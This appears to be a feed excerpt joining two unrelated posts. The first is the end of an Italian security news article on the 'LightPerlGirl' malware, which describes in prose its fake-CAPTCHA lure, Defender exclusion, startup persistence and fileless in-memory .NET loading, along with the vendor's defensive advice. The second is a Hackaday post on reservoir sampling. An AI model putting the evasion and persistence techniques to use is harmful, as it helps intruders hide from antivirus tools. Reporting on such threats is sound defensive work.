Il modulo HelpIO richiede i diritti amministrativi tramite la finestra UAC standard e aggiunge quindi un’eccezione a Windows Defender per la directory “C:\Windows\Temp”. Ciò consente il salvataggio dei componenti successivi senza generare allarmi nei programmi antivirus. Urex garantisce quindi una presenza persistente nel sistema scaricando un file bat chiamato “LixPay.bat” e posizionandolo nella directory Temp esclusa. Crea inoltre un collegamento all’avvio in modo che venga eseguito a ogni avvio del sistema.

L’elemento più complesso, ExWpL, non utilizza affatto il file system. Decrittografa un assembly .NET codificato in base64 e lo esegue direttamente in memoria utilizzando il metodo System.Reflection.Assembly.Load(). Questo approccio evita qualsiasi interazione con il disco, il che complica notevolmente il rilevamento.

Dopo aver completato tutte le fasi, il malware mantiene una connessione stabile con il server di comando e controllo, consentendo agli aggressori di eseguire comandi in tempo reale e di scaricare nuovi componenti senza lasciare tracce nel file system.

Secondo Todyl, il fattore critico dell’infezione è stata la mancanza di sistemi di protezione degli endpoint sul dispositivo attaccato, che ha consentito l’esecuzione dello script iniziale. Tuttavia, il team dell’azienda è riuscito a isolare l’host infetto utilizzando il proprio SIEM e l’analisi dei log degli script di PowerShell.

La chiave dell’attacco è il coinvolgimento dell’utente. Tutto inizia con un singolo clic su un CAPTCHA “sicuro” che esegue effettivamente il codice. Todyl sottolinea che nessun controllo di sicurezza dovrebbe richiedere l’inserimento manuale di comandi. Inoltre, si raccomanda di installare urgentemente strumenti di protezione completa degli endpoint e di utilizzare gli indicatori di compromissione forniti nel report per condurre un’analisi dell’infrastruttura.

LightPerlGirl è un esempio di come l’elegante ingegneria sociale e la sofisticatezza tecnica si fondano per creare una minaccia che non può essere ignorata.

L'articolo LightPerlGirl: Il Malware Invisibile che Sfugge agli Antivirus e Si Attiva con un Click proviene da il blog della sicurezza informatica.

Selecting a random sample from a set is simple. But what about selecting a fair random sample from a set of unknown or indeterminate size? That’s where reservoir sampling comes in, and [Sam Rose] has a beautifully-illustrated, interactive guide to how reservoir sampling works. As far as methods go, it’s as elegant as it is simple, and particularly suited to fairly sampling dynamic datasets like sipping from a firehose of log events.

While reservoir sampling is simple in principle it’s not entirely intuitive to everyone. That’s what makes [Sam]’s interactive essay so helpful; he first articulates the problem before presenting the solution in a way that makes it almost self-evident.

[Sam] uses an imaginary deck of cards to illustrate the problem. If one is being dealt cards one at a time from a deck of unknown size (there could be ten cards, or a million), how can one choose a single card in a way that gives each an equal chance of having been selected? Without collecting them all first?

In a nutshell, the solution is to make a decision every time a new card arrives: hold onto the current card, or replace it with the new one. Each new card is given a 1/n chance of becoming held, where n is the number of cards we’ve seen so far. That’s all it takes. No matter when the dealer stops dealing, each card that has been seen will have had an equal chance of ending up the one selected.

There are a few variations which [Sam] also covers, and practical ways of applying it to log collection, so check it out for yourself.

If [Sam]’s knack for illustrating concepts in an interactive way is your jam, we have one more to point out. Our own Al Williams wrote a piece on Turing machines; the original “universal machine” being a theoretical device with a read/write head and infinite paper tape. A wonderful companion to that article is [Sam]’s piece illustrating exactly how such a Turing machines would work in an interactive way.

hackaday.com/2025/07/02/reserv…